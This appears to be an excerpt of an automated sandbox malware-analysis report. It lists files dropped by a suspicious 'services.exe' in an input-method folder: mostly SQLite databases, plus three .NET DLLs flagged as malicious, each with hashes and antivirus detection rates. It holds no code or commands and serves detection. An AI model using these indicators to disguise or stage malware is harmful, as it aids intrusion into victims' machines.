                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):50176
                                                              Entropy (8bit):5.723168999026349
                                                              Encrypted:false
                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):5.932541123129161
                                                              Encrypted:false
                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):64000
                                                              Entropy (8bit):5.857602289000348
                                                              Encrypted:false
                                                              SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                              MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                              SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                              SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                              SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
